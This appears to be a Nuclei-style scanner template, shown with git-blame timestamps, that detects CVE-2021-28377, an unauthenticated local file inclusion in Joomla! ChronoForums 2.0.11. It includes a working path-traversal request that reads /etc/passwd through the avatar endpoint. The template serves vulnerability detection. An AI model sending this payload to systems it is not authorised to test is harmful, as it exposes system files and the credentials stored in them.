2022-04-01 10:02:22 +00:00
id : CVE-2021-28377
2022-04-22 10:38:41 +00:00
2022-04-01 10:02:22 +00:00
info :
2022-07-26 13:45:11 +00:00
name : Joomla! ChronoForums 2.0.11 - Local File Inclusion
2022-04-01 10:02:22 +00:00
author : 0x_Akoko
2022-05-17 09:18:12 +00:00
severity : medium
2022-07-26 13:45:11 +00:00
description : Joomla! ChronoForums 2.0.11 avatar function is vulnerable to local file inclusion through unauthenticated path traversal attacks. This enables an attacker to read arbitrary files, for example the Joomla! configuration file which contains credentials.
2023-09-06 12:09:01 +00:00
remediation : |
Update Joomla! ChronoForums to the latest version (2.0.12) or apply the provided patch to fix the LFI vulnerability.
2022-04-01 10:02:22 +00:00
reference :
- https://herolab.usd.de/en/security-advisories/usd-2021-0007/
- https://nvd.nist.gov/vuln/detail/CVE-2021-28377
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score : 5.3
2022-04-01 10:02:22 +00:00
cve-id : CVE-2021-28377
2022-05-17 09:18:12 +00:00
cwe-id : CWE-22
2023-08-31 11:46:18 +00:00
epss-score : 0.00158
2023-10-31 18:27:55 +00:00
epss-percentile : 0.52151
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:chronoengine:chronoforums:2.0.11:*:*:*:*:joomla:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : chronoengine
product : chronoforums
2023-09-06 12:09:01 +00:00
framework : joomla
2023-07-11 19:49:27 +00:00
tags : cve,cve2021,chronoforums,lfi,joomla
2022-04-01 10:02:22 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-04-01 10:02:22 +00:00
- method : GET
path :
- "{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
2022-04-02 07:53:16 +00:00
- "root:.*:0:0:"
2022-04-01 10:02:22 +00:00
- type : status
status :
- 200
2023-11-01 14:09:41 +00:00
# digest: 4b0a00483046022100873de7156e0e6e8a93f20b854af4a84d65930044259df6e0912c2388fc080732022100d540c3b23ac3e1f27b792e00e1749ca8e17771fa75bb66444993befe1e8e3a27:922c64590222798bb761d5b6d8e72950